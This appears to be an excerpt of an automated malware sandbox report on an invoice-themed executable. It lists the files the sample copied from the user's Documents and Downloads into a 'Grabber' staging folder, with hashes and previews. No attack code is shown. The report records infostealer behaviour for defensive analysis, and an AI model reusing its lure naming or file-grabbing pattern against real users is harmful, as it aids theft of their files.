Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZU